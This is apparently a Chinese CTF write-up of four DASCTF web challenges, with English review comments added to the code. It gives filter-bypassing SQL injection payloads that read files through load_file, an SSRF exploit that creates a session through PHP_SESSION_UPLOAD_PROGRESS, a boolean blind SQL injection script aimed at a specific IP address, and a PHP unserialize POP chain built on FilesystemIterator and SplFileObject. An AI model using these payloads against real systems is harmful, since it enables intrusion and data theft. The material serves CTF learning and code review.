2021 MAR DASCTF web

本队大师傅AK了web 。。 趁着复现开的环境复现一波 学习了学习了

1.BestDB

看题目就知道是sql注入了

fuzz 一下发现过滤了单引号和空格 尝试用双引号和 # 闭合成功

查询列数 发现有三列 1"/**/order/**/by/**/3#

常规注入 查表名:

-1"union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/database()),3#

#f1agdas

列名

-1"union/**/select/**/group_concat(column_name),2,3/**/from/**/information_schema.columns/**/where/**/table_name="f1agdas"/**/and/**/table_schema=database()#

#f1agdas

数据

-1"union/**/select/**/1,(select/**/f1agdas/**/from/**/f1agdas),3#

#flag.txt 数据库里面没有，于是想到用 load_file 读文件

查数据

-1"union/**/select/**/1,(select/**/load_file(0x2f666c61672e747874)),3#

#这里 flag 这个关键字被过滤了，我们把路径转成 16 进制来读取：hex('/flag.txt') == 0x2f666c61672e747874

2.baby_flask

我写好的 不是很详细 可以看看

https://wh1tecell.top/2021/04/01/ssti%E4%B9%8B%E5%AE%89%E6%81%92%E6%9C%88%E8%B5%9Bbaby-flask%E5%AD%A6%E4%B9%A0/

3.ez_login

源码:

<?php
// Challenge entry point: fetches a caller-supplied URL with curl, guarded only
// by a session check and check_inner_ip(). Lines marked "Review:" are notes
// from a defensive read of the code.
// Review: isset($_SESSION) only tests that a session array exists; it says
// nothing about who the caller is.
if(!isset($_SESSION)){
highlight_file(__FILE__);
die("no session");
}
// check_inner_ip() lives in ./php/check_ip.php, which is not shown on this page,
// so what it actually accepts or rejects cannot be seen from here.
include("./php/check_ip.php");
error_reporting(0);
// Review: $url is taken verbatim from the query string and handed to curl.
$url = $_GET['url'];
if(check_inner_ip($url)){
if($url){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 0);
curl_setopt($ch, CURLOPT_HEADER, 0);
// Review: with CURLOPT_FOLLOWLOCATION set, redirects are followed automatically;
// any host validation should be applied to every hop, not only the initial URL.
curl_setopt($ch, CURLOPT_FOLLOWLOCATION,1);
$output = curl_exec($ch);
$result_info = curl_getinfo($ch);
curl_close($ch);
// Note: neither $output nor $result_info is echoed in this file, so the
// caller does not see the fetched body from this script alone.
}
}else{
echo "Your IP is internal yoyoyo";
}

?>
no session

我们这里要想往下走，必须先过掉 isset($_SESSION) 这个检查；这里利用 PHP_SESSION_UPLOAD_PROGRESS 让服务端创建 session。

exp:

import requests

# Target: the ez_login URL fetcher, asked to retrieve admin.php on localhost.
url = 'http://183.129.189.60:10015/?url=http://localhost/admin.php'
# Posting a PHP_SESSION_UPLOAD_PROGRESS field alongside a file upload triggers
# PHP's session.upload_progress handling, which creates a session — that is
# what gets past the isset($_SESSION) check in the challenge source.
mydata = {'PHP_SESSION_UPLOAD_PROGRESS':'L1yee'}
myfile = {'file':('L1yee.txt','L1yee')}
# The session id is chosen client-side; the server only needs some session to exist.
mycookie = {'PHPSESSID':'x'}

r = requests.post(url=url, data=mydata, files=myfile, cookies=mycookie)
# Debugging aid: print the raw multipart body that was actually sent.
print(r.request.body.decode('utf8'))

print(r.text)

发现:

打开发现 se1f_Log3n.php

<?php
// se1f_Log3n.php: a login check that only answers requests arriving from 127.0.0.1.
// Lines marked "Review:" are notes from a defensive read of the code.
include("./php/db.php");
include("./php/check_ip.php");
error_reporting(E_ALL);
$ip = $_SERVER["REMOTE_ADDR"];
// Review: REMOTE_ADDR is the only access control. Any request that originates on
// the same host — including one made on the caller's behalf by another server-side
// component — satisfies it, so "localhost only" is not an authentication boundary.
if($ip !== "127.0.0.1"){
exit();
}else{
try{
// Review: $username and $password are concatenated straight into the SQL text
// (no prepared statement, no escaping), and the final query is echoed back to
// the client. Neither variable is assigned in this listing; where they come
// from (presumably the request, via one of the included files) is not visible here.
$sql = 'SELECT `username`,`password` FROM `user` WHERE `username`= "'.$username.'" and `password`="'.$password.'";';
$result = $con->query($sql);
echo $sql;
}catch(Exception $e){
echo $e->getMessage();
}
// Review: the response differs depending on whether the query returned rows
// (die("error") vs die('Try again!')). A row-count-dependent response is exactly
// the kind of oracle a boolean blind probe needs; an unconditional, uniform
// failure message removes that signal.
($result->num_rows > 0 AND $row = $result->fetch_assoc() AND $con->close() AND die("error")) OR ( ($con->close() AND die('Try again!') ));
}

盲注脚本

from urllib.parse import quote
import requests
import time

# Boolean-based blind extraction: one request per (position, candidate character).
# Character set tried at each position of the value being read.
asc_str = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ-{}"
# Same session-creation trick as the first script (PHP_SESSION_UPLOAD_PROGRESS).
mydata = {'PHP_SESSION_UPLOAD_PROGRESS':'we'}
myfile = {'file':('a.txt','a')}
mycookie = {'PHPSESSID':'x'}
# The URL-fetch endpoint; the inner request is URL-encoded and appended to ?url=.
ip = 'http://183.129.189.60:10015/?url='

flag = ''
# NOTE: the indentation of the loop bodies was lost when this page was extracted;
# each `for` body is the run of lines that follows it.
for l in range(1,50):
for s in asc_str:
# Inner URL reaches se1f_Log3n.php through localhost. "%23" is a URL-encoded "#",
# which comments out the remainder of the SQL so the password clause never applies.
payload = 'http://localhost//se1f_Log3n.php?username=mochu\'or ascii(mid((select flag from ctf.secret),{},1))={}%23password=x'.format(l,ord(s))
url = ip + quote(payload)
r = requests.post(url=url, data=mydata, files=myfile, cookies=mycookie)
# Fixed delay between probes. There is no early exit, so the outer loop always
# runs through the full position range.
time.sleep(0.5)
# The oracle is a substring of the response body.
# Defender note: the traffic pattern — thousands of near-identical requests to one
# endpoint that differ only in a (position, byte) pair — is the thing to alert on.
if 'correct?' in r.text:
flag += s
print(flag)
else:
pass
# Enumeration step 1 (same loop as above, l = position, s = candidate): which DB
# account the web application connects as. The result recorded below is
# root@localhost — the app runs its login query as the database superuser, far
# more privilege than a credential check needs (least-privilege finding).
payload = 'http://localhost//se1f_Log3n.php?username=mochu\'or ascii(mid((select user()),{},1))={}%23password=x'.format(l,ord(s))

user(): root@localhost


# Step 2: list all schemas (requires read access to information_schema).
payload = 'http://localhost//se1f_Log3n.php?username=mochu\'or ascii(mid((select group_concat(schema_name) from information_schema.schemata),{},1))={}%23password=x'.format(l,ord(s))

databases: ctf,information_schema,mysql,performance_schema,test


# Step 3: tables in the current database.
payload = 'http://localhost//se1f_Log3n.php?username=mochu\'or ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))={}%23password=x'.format(l,ord(s))

Table_in_ctf: secret,users


# Step 4: columns of the `secret` table.
payload = 'http://localhost//se1f_Log3n.php?username=mochu\'or ascii(mid((select group_concat(column_name) from information_schema.columns where table_name=\'secret\'),{},1))={}%23password=x'.format(l,ord(s))

Column_in_secret: flag


# Step 5: the flag column itself (identical to the payload used in the loop above).
payload = 'http://localhost//se1f_Log3n.php?username=mochu\'or ascii(mid((select flag from ctf.secret),{},1))={}%23password=x'.format(l,ord(s))

4.ez_serialize

源码:

 <?php
// Review: error output is suppressed and the full source is shown to the visitor.
// Fine for a challenge; neither belongs in a deployed application.
error_reporting(0);
highlight_file(__FILE__);

class A{
// Review: after unserialize(), $class and $para are whatever the caller put in the
// serialized string, so "new $this->class($this->para)" instantiates any class name
// that survives C::vaild() — with a caller-chosen constructor argument.
public $class;
public $para;
public $check;
public function __construct()
{
$this->class = "B";
$this->para = "ctfer";
echo new $this->class ($this->para);
}
// Review: __wakeup() runs automatically on unserialize(). Its only gate is the
// character denylist in C::vaild(), applied to $para and then $class.
public function __wakeup()
{
$this->check = new C;
if($this->check->vaild($this->para) && $this->check->vaild($this->class)) {
echo new $this->class ($this->para);
}
else
die('bad hacker~');
}

}
class B{
// The class A is meant to instantiate: echoes a greeting built from the argument.
var $a;
public function __construct($a)
{
$this->a = $a;
echo ("hello ".$this->a);
}
}
class C{

// Returns false if $code contains any character from a fixed denylist, true otherwise.
// Review: the pattern is a single character class, so the "|" separators are just
// additional literal characters and the /i flag has no effect (there are no letters
// in the class). More importantly, a character denylist is a weak control for
// deciding which class may be instantiated; an allowlist of the specific class
// names the application intends to construct is the robust check.
function vaild($code){
$pattern = '/[!|@|#|$|%|^|&|*|=|\'|"|:|;|?]/i';
if (preg_match($pattern, $code)){
return false;
}
else
return true;
}
}


// Review: unserialize() is called directly on the raw ?pop= query parameter, so the
// caller decides which class is instantiated and what __wakeup() sees. The fix is
// not to unserialize user input at all (use a plain data format such as JSON), or at
// minimum to restrict it with unserialize($s, ['allowed_classes' => [...]]).
if(isset($_GET['pop'])){
unserialize($_GET['pop']);
}
else{
$a=new A;

}

熟悉的感觉 看到echo new我就想到 php原生文件操作类

参考：https://www.anquanke.com/post/id/167140

<?php

class A{
// Local copy of the challenge's class A, carrying only the two fields __wakeup()
// reads; the values contain none of the characters C::vaild() rejects.
public $class;
public $para;
public $check;
public function __construct()
{
$this->class = "FilesystemIterator";
$this->para = "./aMaz1ng_y0u_c0Uld_f1nd_F1Ag_hErE";
}
// Alternative the author left commented out: SplFileObject pointed at the
// flag file instead of the directory.
// public function __construct()
// {
// $this->class = "SplFileObject";
// $this->para = "./aMaz1ng_y0u_c0Uld_f1nd_F1Ag_hErE/flag.php";
// }


}
// Prints the serialized object that is passed as the ?pop= parameter.
echo serialize(new A);